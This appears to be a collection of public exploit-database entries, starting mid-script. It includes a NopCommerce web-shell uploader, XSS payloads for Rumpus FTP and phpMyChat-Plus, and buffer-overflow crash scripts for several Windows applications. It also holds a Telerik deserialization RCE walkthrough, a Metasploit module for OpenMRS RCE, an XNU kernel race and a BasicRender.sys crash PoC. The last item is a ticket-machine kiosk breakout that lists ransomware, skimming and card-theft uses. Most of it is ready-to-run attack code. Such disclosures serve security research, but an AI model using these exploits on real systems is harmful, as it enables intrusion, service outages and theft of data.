paramDelimeter = \"?\";\r\n\t } else {\r\n\t paramDelimeter = \"&\";\r\n\t }\r\n \r\n\t if (currentUrl.indexOf(\"cmd=\") < 0){\r\n currentUrl = location.href + paramDelimeter + \"cmd=\";\r\n\t }\r\n\t\r\n var newUrl = currentUrl.replace(/cmd=.*/, \"cmd=\"+cmd);\r\n window.location.href = newUrl;\r\n\r\n\t //console.log(newUrl);\r\n\t}\r\n\t\r\n $(\"#submitCommand\").click(function(){\r\n\t executeCmd();\r\n\t})\r\n\r\n\t$(\"#cmd\").keypress(function (e) {\r\n\t if (e.which == 13) {\r\n\t executeCmd();\r\n\t return false;\r\n\t }\r\n\t});\r\n\r\n\t$(\"#cmd\").on(\"change paste keyup\", function(theVal){\r\n\t var cmd = $(\"#cmd\").val();\r\n\t $(\"#cmdInput\").text(cmd);\r\n\t});\r\n});\r\n\r\n</script>\r\n\r\n\r\n<h3>@ViewData[\"Title\"].</h3>\r\n<h4>@ViewData[\"Message\"]</h4>\r\n<h4>Output for:> <span style=\"font-family: monospace; font-weight: normal;\">@cmd</span></h4>\r\n\r\n\r\n<pre id=\"console\" style=\"color: #00ff00;background-color: #141414;max-height: 606px;\">\r\nC#:>@cmd\r\n\t\r\n<span id=\"cmdResult\">@result</span>\r\n\t\r\nC#:><span id=\"cmdInput\"></span>\r\n</pre>\r\n\r\n<br />\r\n\r\n<p>Enter your command below:</p>\r\n<span style=\"display: inline-flex !important;\">\r\n <input id=\"cmd\" class=\"form-control\" type=\"text\" style=\"width: 400px;\" /> \r\n\t<button id=\"submitCommand\" class=\"btn btn-primary\">Send!</button>\r\n</span>\r\n\r\n-----------------------------3125261928760--", proxies=proxy, cookies=cookies, verify=False, allow_redirects=False) # Test if it is working res = requests.get(geturl(url, "contactus"), headers={"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"}, proxies=proxy, cookies=cookies, verify=False, allow_redirects=False) soup = BeautifulSoup(res.text, features="html.parser") test = soup.find("span", {"id" : "cmdResult"}) if test is None: print("[-] Maybe the target is not vulnerable, or you need to restart the appliance") else: print("[+] Shell uploaded under contact us page") def main(): parser = argparse.ArgumentParser(description='Upload a shell in NopCommerce') parser.add_argument( '-e', '--email', required=True, type=str, help='Username') parser.add_argument( '-p', '--password', required=True, type=str, help='Password') parser.add_argument( '-u', '--url', required=True, type=str, help='Base Url of NopCommerce') parser.add_argument( '-x', '--proxy', required=False, action="store_true", help='Proxy (for debugging)') args = parser.parse_args() shellupload(args.email, args.password, args.url, proxy(args.proxy)) if __name__ == '__main__': requests.packages.urllib3.disable_warnings(InsecureRequestWarning) main()

# Exploit Title: Rumpus FTP Web File Manager 8.2.9.1 - Reflected Cross-Site Scripting # Google Dork: site:*.*.com "Web File Manager" inurl:?login= # Shodan Dork: Server: Rumpus # Date: 2019-12-14 # Exploit Author: Harshit Shukla, Sudeepto Roy # Vendor Homepage: https://www.maxum.com/ # Tested On: Windows & Mac # Version: 8.2.9.1 # CVE: CVE-2019-19368 Description: A reflected XSS was identified on the Login page of RUMPUS FTP Web File Manager. PoC: Payload: ?!'><sVg/OnLoAD=alert`1`// Vulnerable URL: http://127.0.0.1/Login?!'><sVg/OnLoAD=alert`1`// Solution: Update to the latest version released by vendor.

# Exploit Title: AVS Audio Converter 9.1 - 'Exit folder' Buffer Overflow # Exploit Author : ZwX # Exploit Date: 2019-12-17 # Vendor Homepage : http://www.avs4you.com/ # Link Software : http://www.avs4you.com/avs-audio-converter.aspx # Tested on OS: Windows 7 ''' Technical Details & Description: ================================ A local buffer overflow vulnerability has been discovered in tihe official AVS Audio Converter. The vulnerability allows local attackers to overwrite the registers (example eip) to compromise the local software process. The issue can be exploited by local attackers with system privileges to compromise the affected local computer system. The vulnerability is marked as classic buffer overflow issue. Analyze Registers: ================== (1e74.1b78): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=00000000 ecx=42424242 edx=778c6d1d esi=00000000 edi=00000000 eip=42424242 esp=0012f098 ebp=0012f0b8 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246 42424242 ?? ??? 0:000> !exchain 0012f0ac: ntdll!ExecuteHandler2+3a (778c6d1d) 0012fa30: 42424242 Invalid exception stack at 41414141 Note: EIP & ECX overwritten Proof of Concept (PoC): ======================= 1.Download and install AVS Audio Converter 2.Open the AVS Audio Converter 3.Run the python operating script that will create a file (poc.txt) 4.copy and paste the characters found in the file (poc.txt) in the field "Exit folder" 5.Click on browse 6.EIP overwritten ''' #!/usr/bin/python buffer = "\x41" * 264 a = "\x42" * 4 b = "\x43" * 1000 poc = buffer + a + b file = open("poc.txt","w") file.write(poc) file.close() print "POC Created by ZwX"

See the full write-up at Bishop Fox, CVE-2019-18935: https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui, for a complete walkthrough of vulnerability and exploit details for this issue (along with patching instructions). Install git clone https://github.com/noperator/CVE-2019-18935.git && cd CVE-2019-18935 python3 -m venv env source env/bin/activate pip3 install -r requirements.txt Requirements This exploit leverages encryption logic from RAU_crypto. The RAUCipher class within RAU_crypto.py depends on PyCryptodome, a drop-in replacement for the dead PyCrypto module. PyCryptodome and PyCrypto create problems when installed in the same environment, so the best way to satisfy this dependency is to install the module within a virtual environment, as shown above. Usage Compile mixed mode assembly DLL payload In a Windows environment with Visual Studio installed, use build_dll.bat to generate 32- and 64-bit mixed mode assembly DLLs to be used as a payload during deserialization. build_dll.bat sleep.c Upload and load payload into application via insecure deserialization Pass the DLL generated above to CVE-2019-18935.py, which will upload the DLL to a directory on the target server (provided that the web server has write permissions) and then load that DLL into the application via the insecure deserialization exploit. python3 CVE-2019-18935.py -u <HOST>/Telerik.Web.UI.WebResource.axd?type=rau -v <VERSION> -f 'C:\Windows\Temp' -p sleep_2019121205271355_x86.dll [*] Local payload name: sleep_2019121205271355_x86.dll [*] Destination folder: C:\Windows\Temp [*] Remote payload name: 1576142987.918625.dll {'fileInfo': {'ContentLength': 75264, 'ContentType': 'application/octet-stream', 'DateJson': '1970-01-01T00:00:00.000Z', 'FileName': '1576142987.918625.dll', 'Index': 0}, 'metaData': {'AsyncUploadTypeName': 'Telerik.Web.UI.UploadedFileInfo, ' 'Telerik.Web.UI, Version=<VERSION>, ' 'Culture=neutral, ' 'PublicKeyToken=<TOKEN>', 'TempFileName': '1576142987.918625.dll'}} [*] Triggering deserialization... <title>Runtime Error</title> <span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1> <h2> <i>Runtime Error</i> </h2></span> ...omitted for brevity... [*] Response time: 13.01 seconds In the example above, the application took at least 10 seconds to respond, indicating that the DLL payload successfully invoked Sleep(10000). Thanks @mwulftange initially discovered this vulnerability. @bao7uo wrote all of the logic for breaking RadAsyncUpload encryption, which enabled manipulating the file upload configuration object in rauPostData and subsequently exploiting insecure deserialization of that object. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47793.zip

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'OpenMRS Java Deserialization RCE', 'Description' => %q( OpenMRS is an open-source platform that supplies users with a customizable medical record system. There exists an object deserialization vulnerability in the `webservices.rest` module used in OpenMRS Platform. Unauthenticated remote code execution can be achieved by sending a malicious XML payload to a Rest API endpoint such as `/ws/rest/v1/concept`. This module uses an XML payload generated with Marshalsec that targets the ImageIO component of the XStream library. Tested on OpenMRS Platform `v2.1.2` and `v2.21` with Java 8 and Java 9. ), 'License' => MSF_LICENSE, 'Author' => [ 'Nicolas Serra', # Vuln Discovery and PoC 'mpgn', # PoC 'Shelby Pace' # Metasploit Module ], 'References' => [ [ 'CVE', '2018-19276' ], [ 'URL', 'https://talk.openmrs.org/t/critical-security-advisory-cve-2018-19276-2019-02-04/21607' ], [ 'URL', 'https://know.bishopfox.com/advisories/news/2019/02/openmrs-insecure-object-deserialization' ], [ 'URL', 'https://github.com/mpgn/CVE-2018-19276/' ] ], 'Platform' => [ 'unix', 'linux' ], 'Arch' => [ ARCH_X86, ARCH_X64 ], 'Targets' => [ [ 'Linux', { 'Arch' => [ ARCH_X86, ARCH_X64 ], 'Platform' => [ 'unix', 'linux' ], 'CmdStagerFlavor' => 'printf' } ] ], 'DisclosureDate' => '2019-02-04', 'DefaultTarget' => 0 )) register_options( [ Opt::RPORT(8081), OptString.new('TARGETURI', [ true, 'Base URI for OpenMRS', '/' ]) ]) register_advanced_options([ OptBool.new('ForceExploit', [ false, 'Override check result', false ]) ]) end def check res = send_request_cgi!('method' => 'GET', 'uri' => normalize_uri(target_uri.path)) return CheckCode::Unknown("OpenMRS page unreachable.") unless res return CheckCode::Safe('Page discovered is not OpenMRS.') unless res.body.downcase.include?('openmrs') response = res.get_html_document version = response.at('body//h3') return CheckCode::Detected('Successfully identified OpenMRS, but cannot detect version') unless version && version.text version_no = version.text version_no = version_no.match(/\d+\.\d+\.\d*/) return CheckCode::Detected('Successfully identified OpenMRS, but cannot detect version') unless version_no version_no = Gem::Version.new(version_no) if (version_no < Gem::Version.new('1.11.8') || version_no.between?(Gem::Version.new('2'), Gem::Version.new('2.1.3'))) return CheckCode::Appears("OpenMRS platform version: #{version_no}") end CheckCode::Safe end def format_payload payload_data = payload.encoded.to_s.encode(xml: :text) payload_arr = payload_data.split(' ', 3) payload_arr.map { |arg| "<string>#{arg}</string>" }.join.gsub("'", "") end def read_payload_data(payload_cmd) # payload generated with Marshalsec erb_path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-19276', 'payload.erb') payload_data = File.binread(erb_path) payload_data = ERB.new(payload_data).result(binding) rescue Errno::ENOENT fail_with(Failure::NotFound, "Failed to find erb file at the given path: #{erb_path}") end def execute_command(cmd, opts={}) cmd = cmd.encode(xml: :text) xml_data = "<string>sh</string><string>-c</string><string>#{cmd}</string>" rest_uri = normalize_uri(target_uri.path, 'ws', 'rest', 'v1', 'concept') payload_data = read_payload_data(xml_data) send_request_cgi( 'method' => 'POST', 'uri' => rest_uri, 'headers' => { 'Content-Type' => 'text/xml' }, 'data' => payload_data ) end def exploit chk_status = check print_status('Target is running OpenMRS') if chk_status == CheckCode::Appears unless ((chk_status == CheckCode::Appears || chk_status == CheckCode::Detected) || datastore['ForceExploit'] ) fail_with(Failure::NoTarget, 'Target is not vulnerable') end cmds = generate_cmdstager(:concat_operator => '&&') print_status('Sending payload...') cmds.first.split('&&').map { |cmd| execute_command(cmd) } end end

The XNU function wait_for_namespace_event() in bsd/vfs/vfs_syscalls.c releases a file descriptor for use by userspace but may then subsequently destroy that file descriptor using fp_free(), which unconditionally frees the fileproc and fileglob. This opens up a race window during which the process could manipulate those objects while they're being freed. Exploitation requires root privileges. The function wait_for_namespace_event() is reachable from fsctl(FSIOC_SNAPSHOT_HANDLER_GET_EXT); it is used to listen for filesystem events for generating a snapshot. Here is the vulnerable path in the code: static int wait_for_namespace_event(namespace_handler_data *nhd, nspace_type_t nspace_type) { ... error = falloc(p, &fp, &indx, ctx); if (error) goto cleanup; fp_alloc_successful = true; ... proc_fdlock(p); procfdtbl_releasefd(p, indx, NULL); fp_drop(p, indx, fp, 1); proc_fdunlock(p); ... error = copyout(&nspace_items[i].token, nhd->token, sizeof(uint32_t)); if (error) goto cleanup; ... cleanup: if (error) { if (fp_alloc_successful) fp_free(p, indx, fp); ... } First the file descriptor (indx) and fileproc (fp) are allocated using falloc(). At this point the file descriptor is reserved, and hence unavailable to userspace. Next, procfdtbl_releasefd() is called to release the file descriptor for use by userspace. After the subsequent proc_fdunlock(), another thread in the process could access that file descriptor via another syscall, even while wait_for_namespace_event() is still running. This is problematic because in the error path wait_for_namespace_event() (reachable if copyout() fails) expects to be able to free the file descriptor with fp_free(). fp_free() is a very special-purpose function: it will clear the file descriptor, free the fileglob, and free the fileproc, without taking into consideration whether the fileproc or fileglob are referenced anywhere else. One way to violate these expectations is to make a call to fileport_makeport() in between the proc_fdunlock() and the fp_free(). The ideal case for exploitation would be that a fileport is created which holds a reference to the fileglob before the fp_free() is used to free it, leaving a dangling fileglob pointer in the fileport. In practice it's tricky to end up in that state, but I believe it's possible. The attached POC should trigger a kernel panic. The POC works as follows: First, an HFS DMG is created and mounted because the only paths that reach wait_for_namespace_event() pass through the HFS driver. Next, several racer threads are created which repeatedly try to call fileport_makeport(). Then, fsctl(FSIOC_SNAPSHOT_HANDLER_GET_EXT) is called to block in wait_for_namespace_event(). The namespace_handler_info_ext structure passed to fsctl() is set up such that the last call to copyout() will fail, which will cause fp_free() to be called. Finally, in order to trigger the bug, another process creates and removes a directory on the mounted HFS DMG, which causes nspace_snapshot_event() to generate an event that wait_for_namespace_event() was waiting for. Usually this will generate a panic with the message "a freed zone element has been modified". Tested on macOS 10.14.6 (18G87). Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47791.zip

# Exploit Title: Microsoft Windows 10 BasicRender.sys - Denial of Service (PoC) # Date: 2019-12-20 # Exploit author: vportal # Vendor homepage: http://www.microsoft.com # Version: Windows 10 1803 x86 # Tested on: Windows 10 1803 x86 # CVE: N/A # A Null pointer deference exists in the WARPGPUCMDSYNC function of the # BasicRender.sys driver. An unprivileged user can trigger the vulnerability # to crash the system and deny the service to the rest of the users. *PoC:* #include <Windows.h> #include <d3dkmthk.h> D3DKMT_CREATEDEVICE* device = NULL; device = new D3DKMT_CREATEDEVICE(); D3DKMT_ENUMADAPTERS enumAdapter = { 0 }; D3DKMTEnumAdapters(&enumAdapter); device->hAdapter = enumAdapter.Adapters[1].hAdapter; logger(log_counter, "EnumAdapter"); D3DKMTCreateDevice(device); D3DKMT_CREATECONTEXTVIRTUAL* contextVirtual = NULL; contextVirtual = new D3DKMT_CREATECONTEXTVIRTUAL(); memset(contextVirtual, 0, sizeof(D3DKMT_CREATECONTEXTVIRTUAL)); contextVirtual->hDevice = device->hDevice; char data[0x200] = { 0 }; memset(data, 0xff, 0x200); contextVirtual->PrivateDriverDataSize = 0x200; contextVirtual->pPrivateDriverData = data; contextVirtual->ClientHint = D3DKMT_CLIENTHINT_DX10; contextVirtual->Flags.InitialData = 0x000001; contextVirtual->Flags.NullRendering = 0x0; D3DKMT_SUBMITCOMMAND* submitCommand = NULL; submitCommand = new D3DKMT_SUBMITCOMMAND(); submitCommand->BroadcastContext[0] = 0x40000240; for (int i = 0; i < 0x10; i++) submitCommand->WrittenPrimaries[i] = 0x0; submitCommand->PresentHistoryToken = 0x100; submitCommand->Commands = 0x004b39; submitCommand->CommandLength = 0x00000d; submitCommand->BroadcastContext[0] = contextVirtual->hContext; submitCommand->BroadcastContextCount = 0x1; submitCommand->Flags.PresentRedirected = 0x1; submitCommand->PrivateDriverDataSize = 0x130; char* PrivateData = NULL; PrivateData = new char[submitCommand->PrivateDriverDataSize]; memset(PrivateData, 0x00, submitCommand->PrivateDriverDataSize); *(DWORD*)(PrivateData + 0x118) = 0x434e5953; *(DWORD*)(PrivateData + 0x11c) = 0x18; *(DWORD*)(PrivateData + 0x120) = 0x000110; *(DWORD*)(PrivateData + 0x124) = 0x000420; *(DWORD*)(PrivateData + 0x128) = 0x0; *(DWORD*)(PrivateData + 0x12c) = 0x000428; submitCommand->pPrivateDriverData = PrivateData; D3DKMTSubmitCommand(submitCommand); -------------------------------------------------------------------------- *Crash dump*: STACK_TEXT: 8afae92c 8fe82cb2 8afae958 fffffffd 0000048c BasicRender!WARPGPUCMDSYNC::WARPGPUCMDSYNC+0xc 8afae94c 8fe8267d bb26afe8 00000000 bb26afe0 BasicRender!WARPKMCONTEXT::SubmitVirtual+0x4a 8afae9a8 8fca6af5 91e05000 bb26afe0 93dfc000 BasicRender!WarpKMSubmitCommandVirtual+0x87 8afae9fc 8fc2a934 8afaea68 8afaeac0 92b19db6 dxgkrnl!ADAPTER_RENDER::DdiSubmitCommandVirtual+0x115 8afaea08 92b19db6 90114c30 8afaea68 b78da008 dxgkrnl!ADAPTER_RENDER_DdiSubmitCommandVirtual+0x10 8afaeac0 92b4ac94 93dfc000 cd6ee008 cc6d8860 dxgmms2!VidSchiSendToExecutionQueue+0x526 8afaeb90 92b764a9 00000000 945f5a80 00000000 dxgmms2!VidSchiSubmitRenderVirtualCommand+0x534 8afaebb8 81ee80bc 93dfc000 28e5f697 00000000 dxgmms2!VidSchiWorkerThread+0x1a1 8afaebf0 81fe952d 92b76308 93dfc000 00000000 nt!PspSystemThreadStartup+0x4a 8afaebfc 00000000 00000000 bbbbbbbb bbbbbbbb nt!KiThreadStartup+0x15 eax=8afae958 ebx=00000000 ecx=00000000 edx=00000000 *esi*=00000000 edi=bb26afd8 eip=8fe8386c esp=8afae920 ebp=8afae92c iopl=0 nv up ei pl zr na pe nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246 BasicRender!WARPGPUCMDSYNC::WARPGPUCMDSYNC+0xc: 8fe8386c c7061060e88f mov dword ptr [esi],offset BasicRender!WARPGPUCMDSYNC::`vftable' (8fe86010) ds:0023:00000000=???????? Resetting default scope -------------------------------------------------------------------------------- The vulnerability has only been tested in Windows 10 x86 1803. CVSS Base Score: 5.5 Credit: Victor Portal

# Exploit Title: Deutsche Bahn Ticket Vending Machine Local Kiosk - Privilege Escalation # Date: 2019-12-18 # Exploit Author: Vulnerability-Lab # Vendor Homepage: https://www.bahn.de/db_vertrieb/view/leistungen/automaten-fahrkartenentwerter.shtml # Tested on: Windows XP Document Title: =============== Deutsche Bahn Ticket Vending Machine - Local Kiosk Privilege Escalation Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2191 Vulnerability Magazine: https://www.vulnerability-db.com/?q=articles/2019/12/13/zero-day-vulnerability-deutsche-bahn-ticket-machine-series-system-uncovered Release Date: ============= 2019-12-14 Vulnerability Laboratory ID (VL-ID): ==================================== 2191 Common Vulnerability Scoring System: ==================================== 6.4 Vulnerability Class: ==================== Privilege Escalation Product & Service Introduction: =============================== Customers can buy tickets at our ticket machines at any time, regardless of opening hours. Thus, the vending machine also secures sales in rural areas. - innovatively designed user guidance - Real-time timetable information for rail traffic - traveler information - ticket paper supply - free fault hotline: 0800 2886644 - Professional and contemporary maintenance The ticket vending machine can also be configured according to individual requirements. The housing can be designed as desired. Customers can purchase their tickets with different means of payment. User guidance is available in different languages. (Copy of the Homepage: https://www.bahn.de/db_vertrieb/view/leistungen/automaten-fahrkartenentwerter.shtml ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a local kiosk privilege escalation vulnerability in the deutsche bahn ticket vending machine series with windows xp. Vulnerability Disclosure Timeline: ================================== 2019-12-14: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Local Severity Level: =============== Medium Authentication Type: ==================== No authentication (guest) User Interaction: ================= No User Interaction Disclosure Type: ================ Responsible Disclosure Program Technical Details & Description: ================================ A kiosk mode escalation vulnerability has been discovered in the official deutsche bahn ticket vending machine series for windows. The security vulnerability allows local attackers to bypass the kiosk mode to compromise the local file system and applications. It is possible for local attackers to break out of the kiosk mode of the Deutsche Bahn vending machine application if the Password Agent (PasswordAgent.exe) of the system receives a timeout or has a runtime error in the program itself in the background. These errors can occur due to aborted sessions, unclean logout or common errors when using the application at system level. In the event of a local error, attackers can bring the error message to the foreground by pressing the number field - Cancel during a transaction. After the error message becomes visible, the attacker can click on a link of the error message where you can normally see what the error report contains. The attacker will then be redirected to a form in the error message, where he can search for errors in a collection of microsoft articles via "Submit / Dont' Submit" or another link on the online path. There the attacker clicks on it and receives the web browser. From the web browser, the attacker retrieves the options menu and can access the local system directory and has then the ability to compromise the ticket vending machine with windows xp. The error message is normally on those devices deactivated through a hardening process of the servce provider. In that special case the exception handling of windows was not deactivated or set to the background, which allows the attacker to move through to other options to finally access the file system via browser. The ticket vending machine vulnerability requires no user interaction and can only be exploited by local attackers with physical device access. No keyboard or front loader opening required. Vulnerable System(s): [+] Windows XP Affected Component(s): [+] Exception Handling (Error Message Content) Proof of Concept (PoC): ======================= The local vulnerability can be exploited by local attackers with physical device access without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. PoC: Sheet PasswordAgent.exe := Unexpected Error (Background) - Runtime/Session/Timeout => Transaction Application => Cancel := Unexpected Error (Background) - Runtime/Session/Timeout (Front) => Click Error Report => Click Search Collection => Web Browser => Local File System => PWND! What are attackers able to do when the file system of the vending machine is accessable thus way? 1. Inject of local malware to the ticket machine (editor / debugger / cmd / ps - exp. ransomware/malware) 2. Local manipulation for skimming devices to assist (transmit prepares) 2. Phishing of local credentials from screen via system (db browser application) 3. Intercept or manipulation to access card information (local file system - sniff/extract) 4. Crash or freeze the computer system (exp. kill of process / loop script) 5. Scare or joké activities (exp. html / js to front screens with web browser or by a new window process) Refernece(s): https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/IMG_6457.JPG https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/IMG_6458.JPG https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/IMG_6460.JPG Solution - Fix & Patch: ======================= There are now several problems related to system hardening that can be resolved: 1. It should not be possible for users with system user rights to use the web browsers 2. The error message menu can be deactivated or completely modified 3. Some functions in menus can be deactivated by hardening (browser, messages & Co.) 4. Check that all other tasks are always running in the background or are being moved there permanently 5. The deutsche bahn vending machine application and user interface should be shut down in the event of persistent errors in the foreground 6. The activities of the testing has been logged but did not triggered any alert for defense purpose Deutsche Bahn: Patch Rollout in Progress https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/073915298_0.png https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/dbatm78235.png Security Risk: ============== The security risk of the local ticket vending machine system vulnerability is estimated as high. The bug to escalate can be easily exploited by local interaction with the touch display to access the file system. Credits & Authors: ================== Benjamin K.M. - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M. Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2019 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com

# Exploit Title: SurfOffline Professional 2.2.0.103 - 'Project Name' Denial of Service (SEH) # Date: 2019-12-18 # Exploit Author: Chris Inzinga # Vendor Homepage: http://www.bimesoft.com/ # Software Link: https://www.softpedia.com/get/Internet/Offline-Browsers/SurfOffline.shtml # Version: 2.2.0.103 # Tested on: Windows 7 SP1 (x86) # Steps to reproduce: # 1. Generate a malicious payload via the PoC # 2. In the application set the 'Start Page URL' to any value, it doesn't matter. # 3. Paste the PoC payload as the 'Project Name' and click 'next' and 'finish'. # 4. Observe a program DOS crash, overwriting SEH=20 #!/usr/bin/python payload =3D "A" * 382 + "B" * 4 + "C" * 4 try: fileCreate =3Dopen("exploit.txt","w") print("[x] Creating file") fileCreate.write(payload) fileCreate.close() print("[x] File created") except: print("[!] File failed to be created")

# Exploit Title: FTP Navigator 8.03 - 'Custom Command' Denial of Service (SEH) # Date: 2019-12-18 # Exploit Author: Chris Inzinga # Vendor Homepage: http://www.internet-soft.com/ # Software Link: https://www.softpedia.com/dyn-postdownload.php/5edd515b8045f156a9dd48599c2539e5/5dfa4560/d0c/0/1 # Version: 8.03 # Tested on: Windows 7 SP1 (x86) # Steps to reproduce: # 1. Generate a malicious payload via the POC # 2. In the application click "FTP - Server" > "Custom Command" # 3. Paste the contents of the PoC file into the input box below SERVER LIST and press "Do it!" # 4. Observe a program DOS crash, overwriting SEH #!/usr/bin/python payload = "A" * 4108 + "B" * 4 + "C" * 40 try: fileCreate =open("exploit.txt","w") print("[x] Creating file") fileCreate.write(payload) fileCreate.close() print("[x] File created") except: print("[!] File failed to be created")

# Exploit Title: phpMyChat-Plus 1.98 - 'pmc_username' Reflected Cross-Site Scripting # Date: 2019-12-19 # Exploit Author: Chris Inzinga # Vendor Homepage: http://ciprianmp.com/latest/ # Download: https://sourceforge.net/projects/phpmychat/ # Tested On: Linux & Mac # Version: 1.98 # CVE: CVE-2019-19908 Description: The "pmc_username" parameter of pass_reset.php is vulnerable to reflected XSS Payload: "><script>alert('xss')</script> Vulnerable URL: http://localhost/plus/pass_reset.php?L=english&pmc_username="><script>alert('xss')</script>